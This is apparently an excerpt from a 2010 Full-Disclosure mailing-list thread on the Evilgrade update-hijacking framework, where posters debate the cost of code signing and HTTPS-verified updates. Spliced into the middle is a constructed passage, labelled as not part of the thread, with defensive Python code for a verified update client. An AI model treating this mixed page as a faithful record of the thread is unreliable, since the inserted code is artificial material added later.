 involves a certain amount of actual cost and effort.  And every organization
 that produces code, be it for-profit proprietary code or free open-source code,
 has to make resource tradeoffs.

Having a signing key that is poorly protected at the vendor's offices
is still better than not signing any updates.


 Is there any actual *evidence* that hijacking authorized updates is a big
 enough problem to be worth it?  If each year, 5 of their customers get pwned
 by the sort of attack that Evilgrade does, but 50,000 get pwned by click here
 popups that code signing won't do squat to prevent, is it really worth their
 time and effort?  Sure, sucks to be one of the 5, but if they instead spend the
 resources to do something *else* to make their customers' lives better that
 would benefit thousands rather than the 5

It *really* doesn't take that much effort to enforce SSL/TLS
certificate verification in the automated update process.  You don't
need to do anything special with code signing.  Just check for
updates via HTTPS URLs and require that verification checks out.

tim

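Tim's prescription above (fetch updates over HTTPS and require that certificate verification checks out, with no special code-signing machinery), as an added example that is not part of this thread: a small Python update client that refuses plaintext update URLs, insists on a verifying TLS context, and pins a SHA-256 of the package obtained out of band. The URL, payload and digest are constructed for illustration, and the offline opener stands in for the network so the policy can be exercised without one.

```python
import hashlib
import io
import ssl
import urllib.request
from urllib.parse import urlparse

class UpdatePolicyError(Exception):
    """An update source or package failed a policy check."""

def check_update_url(url):
    """Refuse anything an on-path attacker could rewrite in cleartext."""
    parts = urlparse(url)
    if parts.scheme != "https" or not parts.hostname:
        raise UpdatePolicyError("update URL must be https:// with a host: %r" % url)
    return parts.hostname

def verifying_context():
    """Defaults of create_default_context made explicit: chain validated against
    the system trust store, hostname checked.  Never relax this to CERT_NONE."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx

def verify_package(data, expected_sha256):
    """Digest obtained out of band (e.g. shipped inside the previous verified
    release), so even a compromised mirror cannot substitute the package."""
    actual = hashlib.sha256(data).hexdigest()
    if actual != expected_sha256.lower():
        raise UpdatePolicyError("package digest mismatch: %s" % actual)
    return True

def fetch_update(url, expected_sha256, opener=urllib.request.urlopen):
    """Download only over verified HTTPS, then check the digest.  `opener`
    is injectable so the policy can be exercised without a network."""
    check_update_url(url)
    with opener(url, context=verifying_context(), timeout=30) as resp:
        data = resp.read()
    verify_package(data, expected_sha256)
    return data

# Constructed offline "server" for demonstration: returns a fixed payload and
# refuses to serve unless the client asked for a verifying TLS context.
CONSTRUCTED_PAYLOAD = b"constructed update payload v2"

def offline_opener(url, context=None, timeout=30):
    if context is None or context.verify_mode != ssl.CERT_REQUIRED:
        raise UpdatePolicyError("client did not request certificate verification")
    return io.BytesIO(CONSTRUCTED_PAYLOAD)
```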


Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

2010-10-31 Thread Valdis . Kletnieks
On Sun, 31 Oct 2010 17:07:06 BST, [lesh] Ivan Nikolic said:

 Christian, Valdis, are you the same person?

Nope, as far as I know...

 what are your motives?

Can't speak for Christian, I'm just here trying to counterbalance all
the ZOMG it needs to be More Secure - quite often that's a knee-jerk
response that hasn't been very well thought out..

 do you really believe the things you are saying?

Yes, I believe that security is about trade-offs, and that often security
measures end up costing more to implement than they're actually worth.
It's one thing to wave your hands and cook up a security scheme that
*sounds* good - it's another entirely to look at it with 30 years of
experience of what's actually *deployable*.

 you seem to be just generally negative, jumping from point to point and being
 very silly.

Devil's Advocate - a dirty job, but somebody has to do it.  It's been said that if
you can't come up with 3 or 4 major flaws in a proposal you make, you haven't
thought it through enough.  Since a lot of people here don't seem to do it for
themselves, somebody else has to.

